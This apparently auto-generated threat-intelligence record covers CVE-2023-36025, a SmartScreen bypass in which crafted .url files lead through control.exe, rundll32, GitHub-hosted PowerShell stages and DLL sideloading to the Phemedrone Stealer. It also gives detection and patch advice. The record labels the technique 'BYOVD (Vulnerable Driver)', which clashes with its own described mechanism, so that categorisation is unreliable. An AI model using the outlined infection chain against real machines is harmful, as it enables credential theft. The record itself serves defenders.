BYOVD (Vulnerable Driver) × Microsoft Windows Defender SmartScreen

A publicly-reported instance of BYOVD (Vulnerable Driver) bypassing Microsoft Windows Defender SmartScreen, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Microsoft Windows Defender SmartScreen

Technique

BYOVD (Vulnerable Driver)

MITRE ATT&CK

T1562.001

Confidence

High

Severity

High

Status

in the wild

Disclosed

2024-01-12

Config / version noted

Not stated

Provenance

www.trendmicro.com
disclosed 2024-01-12 · original source · via raw

Reported as

CVE-2023-36025, a Windows Defender SmartScreen bypass vulnerability, to deliver malware. Attackers use crafted .url files to evade SmartScreen warnings

Mechanism

Crafted Internet Shortcut (.url) files bypass Windows Defender SmartScreen prompts by lacking proper checks. When opened, the .url file downloads and executes a malicious .cpl file via control.exe, which then uses rundll32.exe to run a DLL loader. The loader fetches further PowerShell stages from GitHub, ultimately deploying the Phemedrone Stealer payload through DLL sideloading and scheduled tasks.

Detection & mitigation

Monitor for execution of .url files from untrusted sources, especially those spawning control.exe with .cpl arguments. Detect subsequent PowerShell download cradles and DLL sideloading (e.g., WerFaultSecure.exe loading unsigned wer.dll). Apply the CVE-2023-36025 patch and enforce SmartScreen via GPO.

BYOVD (Vulnerable Driver) has also been recorded against

Avast Baidu BattlEye Bitdefender Carbon Black Cortex CrowdStrike Cylance Easy Anti-Cheat EasyAntiCheat Elastic Fortinet

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.